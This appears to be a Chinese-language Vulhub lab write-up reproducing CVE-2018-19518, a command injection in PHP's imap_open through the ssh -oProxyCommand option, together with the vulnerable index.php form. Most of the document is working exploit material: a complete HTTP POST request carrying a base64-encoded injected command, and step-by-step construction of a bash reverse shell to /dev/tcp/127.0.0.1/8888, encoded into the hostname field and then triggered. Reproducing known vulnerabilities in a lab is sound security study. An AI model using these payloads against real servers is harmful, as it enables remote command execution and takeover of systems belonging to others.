# PHP imap 远程命令执行漏洞 CVE-2018-19518

## 漏洞描述

php imap 扩展用于在 PHP 中执行邮件收发操作。其 `imap_open` 函数会调用 rsh 来连接远程 shell，而 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能（也就是说，在 debian 系列系统中，执行 rsh 命令实际执行的是 ssh 命令）。

因为 ssh 命令中可以通过设置 `-oProxyCommand=` 来调用第三方命令，攻击者通过注入注入这个参数，最终将导致命令执行漏洞。

参考链接：

- https://bugs.php.net/bug.php?id=77153
- https://github.com/Bo0oM/PHP_imap_open_exploit
- https://antichat.com/threads/463395/#post-4254681
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518

## 环境搭建

Vulhub 执行如下命令启动一个包含漏洞的 PHP 环境：

```
docker compose up -d
```

环境启动后，访问 `http://your-ip:8080` 即可查看 web 页面。Web 功能是测试一个邮件服务器是否能够成功连接，需要填写服务器地址、用户名和密码。

目标源码为 index.php

## 漏洞复现

发送如下数据包即可成功执行命令 `echo '1234567890'>/tmp/test0001`：

```
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
```

![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529090507711.png)

执行 `docker compose exec web bash` 进入容器，可见 `/tmp/test0001` 已成功创建：

![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529090441656.png)

写入反弹 shell：

```bash
# Payload
echo "/bin/bash -i >& /dev/tcp/127.0.0.1/8888 0>&1" > /tmp/a

# Base64 Encode
ZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjEiID4gL3RtcC9h
# URL Encode
ZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA%2bJjEiID4gL3RtcC9h
# 组装Payload
# hostname=x+-oProxyCommand%3decho%09[PAYLOAD]|base64%09-d|sh}&username=111&password=222
hostname=x+-oProxyCommand%3decho%09ZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA%2bJjEiID4gL3RtcC9h|base64%09-d|sh}&username=111&password=222
```

![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529093314892.png)

触发反弹 shell：

```shell
# Payload
/bin/bash /tmp/a

# Base64 Encode
L2Jpbi9iYXNoIC90bXAvYQ==
# URL Encode
L2Jpbi9iYXNoIC90bXAvYQ%3d%3d
# 组装Payload
# hostname=x+-oProxyCommand%3decho%09[PAYLOAD]|base64%09-d|sh}&username=111&password=222
hostname=x+-oProxyCommand%3decho%09L2Jpbi9iYXNoIC90bXAvYQ%3d%3d|base64%09-d|sh}&username=111&password=222
```

![](images/PHP%20imap%20远程命令执行漏洞%20CVE-2018-19518/image-20240529093903859.png)

### index.php

```php
<?php
if(!empty($_POST)) {
    $imap = @imap_open('{'.$_POST['hostname'].':993/imap/ssl}INBOX', $_POST['username'], $_POST['password']);
}
?>
<!doctype html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE=" crossorigin="anonymous">

    <title>Input your email server</title>
</head>
<body>

<div class="container">
        <h2>Test your email server</h2>
        <?php if(!empty($_POST)): ?>
        <?php if($imap): ?>
            <div class="alert alert-success" role="alert">
                Connect successful!
            </div>
        <?php else: ?>
            <div class="alert alert-danger" role="alert">
                Connect failed!
            </div>
        <?php endif; ?>
        <?php endif; ?>
        <form method="post">
            <div class="form-group">
                <label>Server address</label>
                <input type="text" name="hostname" class="form-control" >
            </div>
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control" >
            </div>
            <div class="form-group">
                <label>Password</label>
                <input type="password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-primary">Submit</button>
        </form>
</div>


<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.4/dist/umd/popper.min.js" integrity="sha256-EGs9T1xMHdvM1geM8jPpoo8EZ1V1VRsmcJz8OByENLA=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha256-VsEqElsCHSGmnmHXGQzvoWjWwoznFSZc6hs7ARLRacQ=" crossorigin="anonymous"></script>
</body>
</html>
```